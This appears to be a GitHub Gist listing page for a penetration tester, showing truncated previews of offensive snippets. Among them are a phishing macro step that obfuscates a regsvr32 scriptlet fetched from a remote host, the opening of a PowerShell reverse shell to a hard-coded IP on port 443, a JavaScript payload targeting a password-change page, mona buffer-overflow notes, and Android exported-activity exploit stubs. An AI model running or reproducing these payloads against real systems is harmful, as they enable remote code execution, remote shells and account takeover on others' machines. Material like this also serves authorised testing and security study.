aDoN adon90
adon90
/ powershell_api.txt
Created
July 23, 2018 09:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "@ | |
| Add-Type -TypeDefinition @" | |
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| public static class GetAddress | |
| { | |
| [DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)] |
adon90
/ phishing.txt
Last active
August 27, 2022 13:24
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Macro Web_Delivery + Invoke-Obfuscation | |
| Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {WEBDELIVERY_PAYLOAD} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' | |
| e.g | |
| import-module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {regsvr32 /s /n /u /i:http://IP:8080/37yWWx.sct scrobj.dll} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var x = new XMLHttpRequest(); | |
| var r=0; | |
| x.open('GET','https:/XXXXXXX/AgirhNet/StaticWebForm/Outils/ChangePwd.aspx'); | |
| x.responseType = "document"; | |
| x.send(null); | |
| x.onreadystatechange = function() { | |
| if (x.readyState === 4 && r != 1) { | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert(1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpClient('37.187.112.19', 443); | |
| if($socket -eq $null){exit 1} | |
| $stream = $socket.GetStream(); | |
| $writer = new-object System.IO.StreamWriter($stream); | |
| $buffer = new-object System.Byte[] 1024; | |
| $encoding = new-object System.Text.AsciiEncoding; | |
| do | |
| { | |
| $writer.Flush(); | |
| $read = $null; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --- | |
| version: '3.7' | |
| services: | |
| nginx: | |
| build: | |
| context: ./ | |
| dockerfile: Dockerfile.nginx | |
| image: defectdojo/defectdojo-nginx:${NGINX_VERSION:-latest} | |
| depends_on: | |
| - uwsgi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Mona tricks: | |
| --------------- | |
| !mona pc 1000 -> Launch exploit with pattern | |
| !mona findmsp -> autocalculate offset, ESP size..... | |
| No jmp esp in Exec Region (.text) but no DEP: | |
| !mona asm -s "jmp esp" | |
| !mona find -s "\xff\xe4" -m <module> | |
| ----------------- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <a href="william://www.hackplayers.com">MEOW</a> | |
| </html> |
adon90
/ exportedactivityleakexploit.java
Created
September 6, 2020 13:30
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package com.adon.exploitcors; | |
| import androidx.appcompat.app.AppCompatActivity; | |
| import android.content.Intent; | |
| import android.os.Bundle; | |
| import android.widget.Toast; | |
| public class MainActivity extends AppCompatActivity { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package com.example.intentpoc; | |
| import android.os.Bundle; | |
| import androidx.appcompat.app.AppCompatActivity; | |
| import android.content.Intent; | |
| public class MainActivity extends AppCompatActivity { |
NewerOlder